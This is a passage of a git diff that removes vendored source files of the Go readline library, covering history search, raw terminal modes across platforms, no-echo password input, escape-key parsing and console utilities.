1 - } -aggregate: - if size > 0 { - same = runes.Copy(candicate[0][:size]) - for i := 0; i < len(candicate); i++ { - n := runes.Copy(candicate[i]) - copy(n, n[size:]) - candicate[i] = n[:len(n)-size] - } - } - return -} - -func (Runes) TrimSpaceLeft(in []rune) []rune { - firstIndex := len(in) - for i, r := range in { - if unicode.IsSpace(r) == false { - firstIndex = i - break - } - } - return in[firstIndex:] -} diff --git a/vendor/github.com/chzyer/readline/search.go b/vendor/github.com/chzyer/readline/search.go deleted file mode 100644 index 52e8ff09..00000000 --- a/vendor/github.com/chzyer/readline/search.go +++ /dev/null @@ -1,164 +0,0 @@ -package readline - -import ( - "bytes" - "container/list" - "fmt" - "io" -) - -const ( - S_STATE_FOUND = iota - S_STATE_FAILING -) - -const ( - S_DIR_BCK = iota - S_DIR_FWD -) - -type opSearch struct { - inMode bool - state int - dir int - source *list.Element - w io.Writer - buf *RuneBuffer - data []rune - history *opHistory - cfg *Config - markStart int - markEnd int - width int -} - -func newOpSearch(w io.Writer, buf *RuneBuffer, history *opHistory, cfg *Config, width int) *opSearch { - return &opSearch{ - w: w, - buf: buf, - cfg: cfg, - history: history, - width: width, - } -} - -func (o *opSearch) OnWidthChange(newWidth int) { - o.width = newWidth -} - -func (o *opSearch) IsSearchMode() bool { - return o.inMode -} - -func (o *opSearch) SearchBackspace() { - if len(o.data) > 0 { - o.data = o.data[:len(o.data)-1] - o.search(true) - } -} - -func (o *opSearch) findHistoryBy(isNewSearch bool) (int, *list.Element) { - if o.dir == S_DIR_BCK { - return o.history.FindBck(isNewSearch, o.data, o.buf.idx) - } - return o.history.FindFwd(isNewSearch, o.data, o.buf.idx) -} - -func (o *opSearch) search(isChange bool) bool { - if len(o.data) == 0 { - o.state = S_STATE_FOUND - o.SearchRefresh(-1) - return true - } - idx, elem := o.findHistoryBy(isChange) - if elem == nil { - o.SearchRefresh(-2) - return false - } - o.history.current = elem - - item := o.history.showItem(o.history.current.Value) - start, end := 0, 0 - if o.dir == S_DIR_BCK { - start, end = idx, idx+len(o.data) - } else { - start, end = idx, idx+len(o.data) - idx += len(o.data) - } - o.buf.SetWithIdx(idx, item) - o.markStart, o.markEnd = start, end - o.SearchRefresh(idx) - return true -} - -func (o *opSearch) SearchChar(r rune) { - o.data = append(o.data, r) - o.search(true) -} - -func (o *opSearch) SearchMode(dir int) bool { - if o.width == 0 { - return false - } - alreadyInMode := o.inMode - o.inMode = true - o.dir = dir - o.source = o.history.current - if alreadyInMode { - o.search(false) - } else { - o.SearchRefresh(-1) - } - return true -} - -func (o *opSearch) ExitSearchMode(revert bool) { - if revert { - o.history.current = o.source - o.buf.Set(o.history.showItem(o.history.current.Value)) - } - o.markStart, o.markEnd = 0, 0 - o.state = S_STATE_FOUND - o.inMode = false - o.source = nil - o.data = nil -} - -func (o *opSearch) SearchRefresh(x int) { - if x == -2 { - o.state = S_STATE_FAILING - } else if x >= 0 { - o.state = S_STATE_FOUND - } - if x < 0 { - x = o.buf.idx - } - x = o.buf.CurrentWidth(x) - x += o.buf.PromptLen() - x = x % o.width - - if o.markStart > 0 { - o.buf.SetStyle(o.markStart, o.markEnd, "4") - } - - lineCnt := o.buf.CursorLineCount() - buf := bytes.NewBuffer(nil) - buf.Write(bytes.Repeat([]byte("\n"), lineCnt)) - buf.WriteString("\033[J") - if o.state == S_STATE_FAILING { - buf.WriteString("failing ") - } - if o.dir == S_DIR_BCK { - buf.WriteString("bck") - } else if o.dir == S_DIR_FWD { - buf.WriteString("fwd") - } - buf.WriteString("-i-search: ") - buf.WriteString(string(o.data)) // keyword - buf.WriteString("\033[4m \033[0m") // _ - fmt.Fprintf(buf, "\r\033[%dA", lineCnt) // move prev - if x > 0 { - fmt.Fprintf(buf, "\033[%dC", x) // move forward - } - o.w.Write(buf.Bytes()) -} diff --git a/vendor/github.com/chzyer/readline/std.go b/vendor/github.com/chzyer/readline/std.go deleted file mode 100644 index e0c55ee9..00000000 --- a/vendor/github.com/chzyer/readline/std.go +++ /dev/null @@ -1,133 +0,0 @@ -package readline - -import ( - "io" - "os" - "sync" - "sync/atomic" -) - -var ( - Stdin io.ReadCloser = os.Stdin - Stdout io.WriteCloser = os.Stdout - Stderr io.WriteCloser = os.Stderr -) - -var ( - std *Instance - stdOnce sync.Once -) - -// global instance will not submit history automatic -func getInstance() *Instance { - stdOnce.Do(func() { - std, _ = NewEx(&Config{ - DisableAutoSaveHistory: true, - }) - }) - return std -} - -// let readline load history from filepath -// and try to persist history into disk -// set fp to "" to prevent readline persisting history to disk -// so the `AddHistory` will return nil error forever. -func SetHistoryPath(fp string) { - ins := getInstance() - cfg := ins.Config.Clone() - cfg.HistoryFile = fp - ins.SetConfig(cfg) -} - -// set auto completer to global instance -func SetAutoComplete(completer AutoCompleter) { - ins := getInstance() - cfg := ins.Config.Clone() - cfg.AutoComplete = completer - ins.SetConfig(cfg) -} - -// add history to global instance manually -// raise error only if `SetHistoryPath` is set with a non-empty path -func AddHistory(content string) error { - ins := getInstance() - return ins.SaveHistory(content) -} - -func Password(prompt string) ([]byte, error) { - ins := getInstance() - return ins.ReadPassword(prompt) -} - -// readline with global configs -func Line(prompt string) (string, error) { - ins := getInstance() - ins.SetPrompt(prompt) - return ins.Readline() -} - -type CancelableStdin struct { - r io.Reader - mutex sync.Mutex - stop chan struct{} - closed int32 - notify chan struct{} - data []byte - read int - err error -} - -func NewCancelableStdin(r io.Reader) *CancelableStdin { - c := &CancelableStdin{ - r: r, - notify: make(chan struct{}), - stop: make(chan struct{}), - } - go c.ioloop() - return c -} - -func (c *CancelableStdin) ioloop() { -loop: - for { - select { - case <-c.notify: - c.read, c.err = c.r.Read(c.data) - select { - case c.notify <- struct{}{}: - case <-c.stop: - break loop - } - case <-c.stop: - break loop - } - } -} - -func (c *CancelableStdin) Read(b []byte) (n int, err error) { - c.mutex.Lock() - defer c.mutex.Unlock() - if atomic.LoadInt32(&c.closed) == 1 { - return 0, io.EOF - } - - c.data = b - select { - case c.notify <- struct{}{}: - case <-c.stop: - return 0, io.EOF - } - select { - case <-c.notify: - return c.read, c.err - case <-c.stop: - return 0, io.EOF - } -} - -func (c *CancelableStdin) Close() error { - if atomic.CompareAndSwapInt32(&c.closed, 0, 1) { - close(c.stop) - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/std_windows.go b/vendor/github.com/chzyer/readline/std_windows.go deleted file mode 100644 index b10f91bc..00000000 --- a/vendor/github.com/chzyer/readline/std_windows.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build windows - -package readline - -func init() { - Stdin = NewRawReader() - Stdout = NewANSIWriter(Stdout) - Stderr = NewANSIWriter(Stderr) -} diff --git a/vendor/github.com/chzyer/readline/term.go b/vendor/github.com/chzyer/readline/term.go deleted file mode 100644 index 133993ca..00000000 --- a/vendor/github.com/chzyer/readline/term.go +++ /dev/null @@ -1,123 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd solaris - -// Package terminal provides support functions for dealing with terminals, as -// commonly found on UNIX systems. -// -// Putting a terminal into raw mode is the most common requirement: -// -// oldState, err := terminal.MakeRaw(0) -// if err != nil { -// panic(err) -// } -// defer terminal.Restore(0, oldState) -package readline - -import ( - "io" - "syscall" -) - -// State contains the state of a terminal. -type State struct { - termios Termios -} - -// IsTerminal returns true if the given file descriptor is a terminal. -func IsTerminal(fd int) bool { - _, err := getTermios(fd) - return err == nil -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd int) (*State, error) { - var oldState State - - if termios, err := getTermios(fd); err != nil { - return nil, err - } else { - oldState.termios = *termios - } - - newState := oldState.termios - // This attempts to replicate the behaviour documented for cfmakeraw in - // the termios(3) manpage. - newState.Iflag &^= syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON - // newState.Oflag &^= syscall.OPOST - newState.Lflag &^= syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN - newState.Cflag &^= syscall.CSIZE | syscall.PARENB - newState.Cflag |= syscall.CS8 - - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - return &oldState, setTermios(fd, &newState) -} - -// GetState returns the current state of a terminal which may be useful to -// restore the terminal after a signal. -func GetState(fd int) (*State, error) { - termios, err := getTermios(fd) - if err != nil { - return nil, err - } - - return &State{termios: *termios}, nil -} - -// Restore restores the terminal connected to the given file descriptor to a -// previous state. -func restoreTerm(fd int, state *State) error { - return setTermios(fd, &state.termios) -} - -// ReadPassword reads a line of input from a terminal without local echo. This -// is commonly used for inputting passwords and other sensitive data. The slice -// returned does not include the \n. -func ReadPassword(fd int) ([]byte, error) { - oldState, err := getTermios(fd) - if err != nil { - return nil, err - } - - newState := oldState - newState.Lflag &^= syscall.ECHO - newState.Lflag |= syscall.ICANON | syscall.ISIG - newState.Iflag |= syscall.ICRNL - if err := setTermios(fd, newState); err != nil { - return nil, err - } - - defer func() { - setTermios(fd, oldState) - }() - - var buf [16]byte - var ret []byte - for { - n, err := syscall.Read(fd, buf[:]) - if err != nil { - return nil, err - } - if n == 0 { - if len(ret) == 0 { - return nil, io.EOF - } - break - } - if buf[n-1] == '\n' { - n-- - } - ret = append(ret, buf[:n]...) - if n < len(buf) { - break - } - } - - return ret, nil -} diff --git a/vendor/github.com/chzyer/readline/term_bsd.go b/vendor/github.com/chzyer/readline/term_bsd.go deleted file mode 100644 index 68b56ea6..00000000 --- a/vendor/github.com/chzyer/readline/term_bsd.go +++ /dev/null @@ -1,29 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd netbsd openbsd - -package readline - -import ( - "syscall" - "unsafe" -) - -func getTermios(fd int) (*Termios, error) { - termios := new(Termios) - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), syscall.TIOCGETA, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return nil, err - } - return termios, nil -} - -func setTermios(fd int, termios *Termios) error { - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), syscall.TIOCSETA, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return err - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/term_linux.go b/vendor/github.com/chzyer/readline/term_linux.go deleted file mode 100644 index e3392b4a..00000000 --- a/vendor/github.com/chzyer/readline/term_linux.go +++ /dev/null @@ -1,33 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package readline - -import ( - "syscall" - "unsafe" -) - -// These constants are declared here, rather than importing -// them from the syscall package as some syscall packages, even -// on linux, for example gccgo, do not declare them. -const ioctlReadTermios = 0x5401 // syscall.TCGETS -const ioctlWriteTermios = 0x5402 // syscall.TCSETS - -func getTermios(fd int) (*Termios, error) { - termios := new(Termios) - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlReadTermios, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return nil, err - } - return termios, nil -} - -func setTermios(fd int, termios *Termios) error { - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), ioctlWriteTermios, uintptr(unsafe.Pointer(termios)), 0, 0, 0) - if err != 0 { - return err - } - return nil -} diff --git a/vendor/github.com/chzyer/readline/term_solaris.go b/vendor/github.com/chzyer/readline/term_solaris.go deleted file mode 100644 index 4c27273c..00000000 --- a/vendor/github.com/chzyer/readline/term_solaris.go +++ /dev/null @@ -1,32 +0,0 @@ -// Copyright 2013 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build solaris - -package readline - -import "golang.org/x/sys/unix" - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (int, int, error) { - ws, err := unix.IoctlGetWinsize(fd, unix.TIOCGWINSZ) - if err != nil { - return 0, 0, err - } - return int(ws.Col), int(ws.Row), nil -} - -type Termios unix.Termios - -func getTermios(fd int) (*Termios, error) { - termios, err := unix.IoctlGetTermios(fd, unix.TCGETS) - if err != nil { - return nil, err - } - return (*Termios)(termios), nil -} - -func setTermios(fd int, termios *Termios) error { - return unix.IoctlSetTermios(fd, unix.TCSETSF, (*unix.Termios)(termios)) -} diff --git a/vendor/github.com/chzyer/readline/term_unix.go b/vendor/github.com/chzyer/readline/term_unix.go deleted file mode 100644 index d3ea2424..00000000 --- a/vendor/github.com/chzyer/readline/term_unix.go +++ /dev/null @@ -1,24 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd - -package readline - -import ( - "syscall" - "unsafe" -) - -type Termios syscall.Termios - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (int, int, error) { - var dimensions [4]uint16 - _, _, err := syscall.Syscall6(syscall.SYS_IOCTL, uintptr(fd), uintptr(syscall.TIOCGWINSZ), uintptr(unsafe.Pointer(&dimensions)), 0, 0, 0) - if err != 0 { - return 0, 0, err - } - return int(dimensions[1]), int(dimensions[0]), nil -} diff --git a/vendor/github.com/chzyer/readline/term_windows.go b/vendor/github.com/chzyer/readline/term_windows.go deleted file mode 100644 index 1290e00b..00000000 --- a/vendor/github.com/chzyer/readline/term_windows.go +++ /dev/null @@ -1,171 +0,0 @@ -// Copyright 2011 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -// +build windows - -// Package terminal provides support functions for dealing with terminals, as -// commonly found on UNIX systems. -// -// Putting a terminal into raw mode is the most common requirement: -// -// oldState, err := terminal.MakeRaw(0) -// if err != nil { -// panic(err) -// } -// defer terminal.Restore(0, oldState) -package readline - -import ( - "io" - "syscall" - "unsafe" -) - -const ( - enableLineInput = 2 - enableEchoInput = 4 - enableProcessedInput = 1 - enableWindowInput = 8 - enableMouseInput = 16 - enableInsertMode = 32 - enableQuickEditMode = 64 - enableExtendedFlags = 128 - enableAutoPosition = 256 - enableProcessedOutput = 1 - enableWrapAtEolOutput = 2 -) - -var kernel32 = syscall.NewLazyDLL("kernel32.dll") - -var ( - procGetConsoleMode = kernel32.NewProc("GetConsoleMode") - procSetConsoleMode = kernel32.NewProc("SetConsoleMode") - procGetConsoleScreenBufferInfo = kernel32.NewProc("GetConsoleScreenBufferInfo") -) - -type ( - coord struct { - x short - y short - } - smallRect struct { - left short - top short - right short - bottom short - } - consoleScreenBufferInfo struct { - size coord - cursorPosition coord - attributes word - window smallRect - maximumWindowSize coord - } -) - -type State struct { - mode uint32 -} - -// IsTerminal returns true if the given file descriptor is a terminal. -func IsTerminal(fd int) bool { - var st uint32 - r, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - return r != 0 && e == 0 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd int) (*State, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - raw := st &^ (enableEchoInput | enableProcessedInput | enableLineInput | enableProcessedOutput) - _, _, e = syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(raw), 0) - if e != 0 { - return nil, error(e) - } - return &State{st}, nil -} - -// GetState returns the current state of a terminal which may be useful to -// restore the terminal after a signal. -func GetState(fd int) (*State, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - return &State{st}, nil -} - -// Restore restores the terminal connected to the given file descriptor to a -// previous state. -func restoreTerm(fd int, state *State) error { - _, _, err := syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(state.mode), 0) - return err -} - -// GetSize returns the dimensions of the given terminal. -func GetSize(fd int) (width, height int, err error) { - var info consoleScreenBufferInfo - _, _, e := syscall.Syscall(procGetConsoleScreenBufferInfo.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&info)), 0) - if e != 0 { - return 0, 0, error(e) - } - return int(info.size.x), int(info.size.y), nil -} - -// ReadPassword reads a line of input from a terminal without local echo. This -// is commonly used for inputting passwords and other sensitive data. The slice -// returned does not include the \n. -func ReadPassword(fd int) ([]byte, error) { - var st uint32 - _, _, e := syscall.Syscall(procGetConsoleMode.Addr(), 2, uintptr(fd), uintptr(unsafe.Pointer(&st)), 0) - if e != 0 { - return nil, error(e) - } - old := st - - st &^= (enableEchoInput) - st |= (enableProcessedInput | enableLineInput | enableProcessedOutput) - _, _, e = syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(st), 0) - if e != 0 { - return nil, error(e) - } - - defer func() { - syscall.Syscall(procSetConsoleMode.Addr(), 2, uintptr(fd), uintptr(old), 0) - }() - - var buf [16]byte - var ret []byte - for { - n, err := syscall.Read(syscall.Handle(fd), buf[:]) - if err != nil { - return nil, err - } - if n == 0 { - if len(ret) == 0 { - return nil, io.EOF - } - break - } - if buf[n-1] == '\n' { - n-- - } - if n > 0 && buf[n-1] == '\r' { - n-- - } - ret = append(ret, buf[:n]...) - if n < len(buf) { - break - } - } - - return ret, nil -} diff --git a/vendor/github.com/chzyer/readline/terminal.go b/vendor/github.com/chzyer/readline/terminal.go deleted file mode 100644 index 80147122..00000000 --- a/vendor/github.com/chzyer/readline/terminal.go +++ /dev/null @@ -1,232 +0,0 @@ -package readline - -import ( - "bufio" - "fmt" - "io" - "strings" - "sync" - "sync/atomic" -) - -type Terminal struct { - m sync.Mutex - cfg *Config - outchan chan rune - closed int32 - stopChan chan struct{} - kickChan chan struct{} - wg sync.WaitGroup - isReading int32 - sleeping int32 - - sizeChan chan string -} - -func NewTerminal(cfg *Config) (*Terminal, error) { - if err := cfg.Init(); err != nil { - return nil, err - } - t := &Terminal{ - cfg: cfg, - kickChan: make(chan struct{}, 1), - outchan: make(chan rune), - stopChan: make(chan struct{}, 1), - sizeChan: make(chan string, 1), - } - - go t.ioloop() - return t, nil -} - -// SleepToResume will sleep myself, and return only if I'm resumed. -func (t *Terminal) SleepToResume() { - if !atomic.CompareAndSwapInt32(&t.sleeping, 0, 1) { - return - } - defer atomic.StoreInt32(&t.sleeping, 0) - - t.ExitRawMode() - ch := WaitForResume() - SuspendMe() - <-ch - t.EnterRawMode() -} - -func (t *Terminal) EnterRawMode() (err error) { - return t.cfg.FuncMakeRaw() -} - -func (t *Terminal) ExitRawMode() (err error) { - return t.cfg.FuncExitRaw() -} - -func (t *Terminal) Write(b []byte) (int, error) { - return t.cfg.Stdout.Write(b) -} - -type termSize struct { - left int - top int -} - -func (t *Terminal) GetOffset(f func(offset string)) { - go func() { - f(<-t.sizeChan) - }() - t.Write([]byte("\033[6n")) -} - -func (t *Terminal) Print(s string) { - fmt.Fprintf(t.cfg.Stdout, "%s", s) -} - -func (t *Terminal) PrintRune(r rune) { - fmt.Fprintf(t.cfg.Stdout, "%c", r) -} - -func (t *Terminal) Readline() *Operation { - return NewOperation(t, t.cfg) -} - -// return rune(0) if meet EOF -func (t *Terminal) ReadRune() rune { - ch, ok := <-t.outchan - if !ok { - return rune(0) - } - return ch -} - -func (t *Terminal) IsReading() bool { - return atomic.LoadInt32(&t.isReading) == 1 -} - -func (t *Terminal) KickRead() { - select { - case t.kickChan <- struct{}{}: - default: - } -} - -func (t *Terminal) ioloop() { - t.wg.Add(1) - defer func() { - t.wg.Done() - close(t.outchan) - }() - - var ( - isEscape bool - isEscapeEx bool - expectNextChar bool - ) - - buf := bufio.NewReader(t.getStdin()) - for { - if !expectNextChar { - atomic.StoreInt32(&t.isReading, 0) - select { - case <-t.kickChan: - atomic.StoreInt32(&t.isReading, 1) - case <-t.stopChan: - return - } - } - expectNextChar = false - r, _, err := buf.ReadRune() - if err != nil { - if strings.Contains(err.Error(), "interrupted system call") { - expectNextChar = true - continue - } - break - } - - if isEscape { - isEscape = false - if r == CharEscapeEx { - expectNextChar = true - isEscapeEx = true - continue - } - r = escapeKey(r, buf) - } else if isEscapeEx { - isEscapeEx = false - if key := readEscKey(r, buf); key != nil { - r = escapeExKey(key) - // offset - if key.typ == 'R' { - if _, _, ok := key.Get2(); ok { - select { - case t.sizeChan <- key.attr: - default: - } - } - expectNextChar = true - continue - } - } - if r == 0 { - expectNextChar = true - continue - } - } - - expectNextChar = true - switch r { - case CharEsc: - if t.cfg.VimMode { - t.outchan <- r - break - } - isEscape = true - case CharInterrupt, CharEnter, CharCtrlJ, CharDelete: - expectNextChar = false - fallthrough - default: - t.outchan <- r - } - } - -} - -func (t *Terminal) Bell() { - fmt.Fprintf(t, "%c", CharBell) -} - -func (t *Terminal) Close() error { - if atomic.SwapInt32(&t.closed, 1) != 0 { - return nil - } - if closer, ok := t.cfg.Stdin.(io.Closer); ok { - closer.Close() - } - close(t.stopChan) - t.wg.Wait() - return t.ExitRawMode() -} - -func (t *Terminal) GetConfig() *Config { - t.m.Lock() - cfg := *t.cfg - t.m.Unlock() - return &cfg -} - -func (t *Terminal) getStdin() io.Reader { - t.m.Lock() - r := t.cfg.Stdin - t.m.Unlock() - return r -} - -func (t *Terminal) SetConfig(c *Config) error { - if err := c.Init(); err != nil { - return err - } - t.m.Lock() - t.cfg = c - t.m.Unlock() - return nil -} diff --git a/vendor/github.com/chzyer/readline/utils.go b/vendor/github.com/chzyer/readline/utils.go deleted file mode 100644 index 670736b3..00000000 --- a/vendor/github.com/chzyer/readline/utils.go +++ /dev/null @@ -1,276 +0,0 @@ -package readline - -import ( - "bufio" - "bytes" - "container/list" - "fmt" - "os" - "strconv" - "strings" - "sync" - "time" - "unicode" -) - -var ( - isWindows = false -) - -const ( - CharLineStart = 1 - CharBackward = 2 - CharInterrupt = 3 - CharDelete = 4 - CharLineEnd = 5 - CharForward = 6 - CharBell = 7 - CharCtrlH = 8 - CharTab = 9 - CharCtrlJ = 10 - CharKill = 11 - CharCtrlL = 12 - CharEnter = 13 - CharNext = 14 - CharPrev = 16 - CharBckSearch = 18 - CharFwdSearch = 19 - CharTranspose = 20 - CharCtrlU = 21 - CharCtrlW = 23 - CharCtrlZ = 26 - CharEsc = 27 - CharEscapeEx = 91 - CharBackspace = 127 -) - -const ( - MetaBackward rune = -iota - 1 - MetaForward - MetaDelete - MetaBackspace - MetaTranspose -) - -// WaitForResume need to call before current process got suspend. -// It will run a ticker until a long duration is occurs, -// which means this process is resumed. -func WaitForResume() chan struct{} { - ch := make(chan struct{}) - var wg sync.WaitGroup - wg.Add(1) - go func() { - ticker := time.NewTicker(10 * time.Millisecond) - t := time.Now() - wg.Done() - for { - now := <-ticker.C - if now.Sub(t) > 100*time.Millisecond { - break - } - t = now - } - ticker.Stop() - ch <- struct{}{} - }() - wg.Wait() - return ch -} - -func Restore(fd int, state *State) error { - err := restoreTerm(fd, state) - if err != nil { - // errno 0 means everything is ok :) - if err.Error() == "errno 0" { - return nil - } else { - return err - } - } - return nil -} - -func IsPrintable(key rune) bool { - isInSurrogateArea := key >= 0xd800 && key <= 0xdbff - return key >= 32 && !isInSurrogateArea -} - -// translate Esc[X -func escapeExKey(key *escapeKeyPair) rune { - var r rune - switch key.typ { - case 'D': - r = CharBackward - case 'C': - r = CharForward - case 'A': - r = CharPrev - case 'B': - r = CharNext - case 'H': - r = CharLineStart - case 'F': - r = CharLineEnd - case '~': - if key.attr == "3" { - r = CharDelete - } - default: - } - return r -} - -type escapeKeyPair struct { - attr string - typ rune -} - -func (e *escapeKeyPair) Get2() (int, int, bool) { - sp := strings.Split(e.attr, ";") - if len(sp) < 2 { - return -1, -1, false - } - s1, err := strconv.Atoi(sp[0]) - if err != nil { - return -1, -1, false - } - s2, err := strconv.Atoi(sp[1]) - if err != nil { - return -1, -1, false - } - return s1, s2, true -} - -func readEscKey(r rune, reader *bufio.Reader) *escapeKeyPair { - p := escapeKeyPair{} - buf := bytes.NewBuffer(nil) - for { - if r == ';' { - } else if unicode.IsNumber(r) { - } else { - p.typ = r - break - } - buf.WriteRune(r) - r, _, _ = reader.ReadRune() - } - p.attr = buf.String() - return &p -} - -// translate EscX to Meta+X -func escapeKey(r rune, reader *bufio.Reader) rune { - switch r { - case 'b': - r = MetaBackward - case 'f': - r = MetaForward - case 'd': - r = MetaDelete - case CharTranspose: - r = MetaTranspose - case CharBackspace: - r = MetaBackspace - case 'O': - d, _, _ := reader.ReadRune() - switch d { - case 'H': - r = CharLineStart - case 'F': - r = CharLineEnd - default: - reader.UnreadRune() - } - case CharEsc: - - } - return r -} - -func SplitByLine(start, screenWidth int, rs []rune) []string { - var ret []string - buf := bytes.NewBuffer(nil) - currentWidth := start - for _, r := range rs { - w := runes.Width(r) - currentWidth += w - buf.WriteRune(r) - if currentWidth >= screenWidth { - ret = append(ret, buf.String()) - buf.Reset() - currentWidth = 0 - } - } - ret = append(ret, buf.String()) - return ret -} - -// calculate how many lines for N character -func LineCount(screenWidth, w int) int { - r := w / screenWidth - if w%screenWidth != 0 { - r++ - } - return r -} - -func IsWordBreak(i rune) bool { - switch { - case i >= 'a' && i <= 'z': - case i >= 'A' && i <= 'Z': - case i >= '0' && i <= '9': - default: - return true - } - return false -} - -func GetInt(s []string, def int) int { - if len(s) == 0 { - return def - } - c, err := strconv.Atoi(s[0]) - if err != nil { - return def - } - return c -} - -type RawMode struct { - state *State -} - -func (r *RawMode) Enter() (err error) { - r.state, err = MakeRaw(GetStdin()) - return err -} - -func (r *RawMode) Exit() error { - if r.state == nil { - return nil - } - return Restore(GetStdin(), r.state) -} - -// ----------------------------------------------------------------------------- - -func sleep(n int) { - Debug(n) - time.Sleep(2000 * time.Millisecond) -} - -// print a linked list to Debug() -func debugList(l *list.List) { - idx := 0 - for e := l.Front(); e != nil; e = e.Next() { - Debug(idx, fmt.Sprintf("%+v", e.Value)) - idx++ - } -} - -// append log info to another file -func Debug(o ...interface{}) { - f, _ := os.OpenFile("debug.tmp", os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666) - fmt.Fprintln(f, o...) - f.Close() -} diff --git a/vendor/github.com/chzyer/readline/utils_unix.go b/vendor/github.com/chzyer/readline/utils_unix.go deleted file mode 100644 index f88dac97..00000000 --- a/vendor/github.com/chzyer/readline/utils_unix.go +++ /dev/null @@ -1,83 +0,0 @@ -// +build darwin dragonfly freebsd linux,!appengine netbsd openbsd solaris - -package readline - -import ( - "io" - "os" - "os/signal" - "sync" - "syscall" -) - -type winsize struct { - Row uint16 - Col uint16 - Xpixel uint16 - Ypixel uint16 -} - -// SuspendMe use to send suspend signal to myself, when we in the raw mode. -// For OSX it need to send to parent's pid -// For Linux it need to send to myself -func SuspendMe() { - p, _ := os.FindProcess(os.Getppid()) - p.Signal(syscall.SIGTSTP) - p, _ = os.FindProcess(os.Getpid()) - p.Signal(syscall.SIGTSTP) -} - -// get width of the terminal -func getWidth(stdoutFd int) int { - cols, _, err := GetSize(stdoutFd) - if err != nil { - return -1 - } - return cols -} - -func GetScreenWidth() int { - w := getWidth(syscall.Stdout) - if w < 0 { - w = getWidth(syscall.Stderr) - } - return w -} - -// ClearScreen clears the console screen -func ClearScreen(w io.Writer) (int, error) { - return w.Write([]byte("\033[H")) -} - -func DefaultIsTerminal() bool { - return IsTerminal(syscall.Stdin) && (IsTerminal(syscall.Stdout) || IsTerminal(syscall.Stderr)) -} - -func GetStdin() int { - return syscall.Stdin -} - -// ----------------------------------------------------------------------------- - -var ( - widthChange sync.Once - widthChangeCallback func() -) - -func DefaultOnWidthChanged(f func()) { - widthChangeCallback = f - widthChange.Do(func() { - ch := make(chan os.Signal, 1) - signal.Notify(ch, syscall.SIGWINCH) - - go func() { - for { - _, ok := <-ch - if !ok { - break - } - widthChangeCallback() - } - }() - }) -} diff --git a/vendor/github.com/chzyer/readline/utils_windows.go b/vendor/github.com/chzyer/readline/utils_windows.go deleted file mode 100644 index 5bfa55dc..00000000 --- a/vendor/github.com/chzyer/readline/utils_windows.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build windows - -package readline - -import ( - "io" - "syscall" -) - -func SuspendMe() { -} - -func GetStdin() int { - return int(syscall.Stdin) -} - -func init() { - isWindows = true -} - -// get width of the terminal -func GetScreenWidth() int { - info, _ := GetConsoleScreenBufferInfo() - if info == nil { - return -1 - } - return int(info.dwSize.x) -} - -// ClearScreen clears the console screen -func ClearScreen(_ io.Writer) error { - return SetConsoleCursorPosition(&_COORD{0, 0}) -} - -func DefaultIsTerminal() bool { - return true -} - -func DefaultOnWidthChanged(func()) { - -} diff --git a/vendor/github.com/chzyer/readline/vim.go b/vendor/github.com/chzyer/readline/vim.go deleted file mode 100644 index 641b22b7..00000000 --- a/vendor/github.com/chzyer/readline/vim.go +++ /dev/null @@ -1,174 +0,0 @@ -package readline - -const ( - VIM_NORMAL = iota - VIM_INSERT - VIM_VISUAL -) - -type opVim struct { - cfg *Config - op *Operation - vimMode int -} - -func newVimMode(op *Operation) *opVim { - ov := &opVim{ - cfg: op.cfg, - op: op, - } - ov.SetVimMode(ov.cfg.VimMode) - return ov -} - -func (o *opVim) SetVimMode(on bool) { - if o.cfg.VimMode && !on { // turn off - o.ExitVimMode() - } - o.cfg.VimMode = on - o.vimMode = VIM_INSERT -} - -func (o *opVim) 